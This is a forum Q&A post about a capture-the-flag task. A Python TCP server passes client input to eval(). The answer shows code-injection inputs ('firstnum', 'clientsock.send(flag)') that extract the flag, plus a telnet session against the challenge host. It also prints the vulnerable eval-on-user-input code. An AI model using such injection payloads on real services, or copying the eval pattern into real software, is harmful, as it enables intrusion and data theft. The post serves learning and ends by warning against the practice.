Injecting python code into TCP socket server -
i stuck in task question i'm solving penetration testing, given simple tcp web server, , connect , give 2 values, if match in end, flag, given snippet of server code. have tried know flag. here's code:
clientsock.send("welcome maths_server 1.0\n") try: clientsock.send("enter first number, can evaluate it:\n") firstnum = eval(clientsock.recv(1024)) firstnum = firstnum + firstnum + ord(flag[4]) + ord(flag[8]) + ord(flag[5]) clientsock.send("enter second number, can evaluate it:\n") secondnum = eval(clientsock.recv(1024)) if secondnum == firstnum: clientsock.send("the flag is: " + flag + "\n") firstnum = 0 secondnum = 0 except: pass clientsock.close()
just send string firstnum second message. succeed no matter used value firstnum initially:
secondnum = eval(clientsock.recv(1024)) -> secondnum = eval("firstnum") -> secondnum = ... value of firstnum this can done telnet
$ telnet services.cyberprotection.agency 3166 welcome maths_server 1.0 enter first number, can evaluate it: 10 enter second number, can evaluate it: firstnum flag is: .... (try yourself)... another possibility send string clientsock.send(flag) first number send value of flag back. note not work test server, guess source code different , not execute kind of code given remote user if matches expectations of task got. works test installation of given code.
which leads conclusion 1 should never ever eval unsanitized user input.
Comments
Post a Comment